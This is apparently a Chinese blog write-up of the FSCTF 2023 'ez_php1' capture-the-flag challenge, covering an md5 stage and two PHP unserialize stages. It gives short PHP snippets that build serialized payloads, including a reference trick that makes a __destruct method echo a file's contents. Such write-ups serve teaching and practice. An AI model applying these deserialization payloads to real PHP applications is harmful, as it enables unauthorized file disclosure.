[FSCTF 2023]ez_php1

一共有三小关

第一关:md5加密

第二关:反序列化

重点 单个字符串序列化 unserialize($str) === "$KEY"

php 复制代码
<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。

php 复制代码
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
相关推荐
BingoGo12 小时前
PHP 开发者应该理解的 Linux 入门权限指南
后端·php
emma羊羊12 小时前
【文件读写】18,21关
网络安全·upload
苏琢玉13 小时前
再也不用翻一堆日志!一键部署轻量级错误监控系统,帮你统一管理 PHP 报错
go·github·php
JaguarJack15 小时前
PHP 开发者应该理解的 Linux 入门权限指南
后端·php
2301_7931679915 小时前
网络管理部分
linux·运维·服务器·网络·php
Mr_Meng_De1 天前
AI环境下的网络安全人才的发展方向
安全·web安全
李白你好1 天前
一款基于 PHP 的轻量级Webshell管理工具
php
啥都不懂的小小白1 天前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
电子科技圈1 天前
芯科科技第三代无线SoC现已全面供货
嵌入式硬件·mcu·物联网·网络安全·智能家居·智能硬件·iot
星光一影1 天前
【OA办公系统】神点企业OA办公助手/全开源
mysql·nginx·开源·php·源代码管理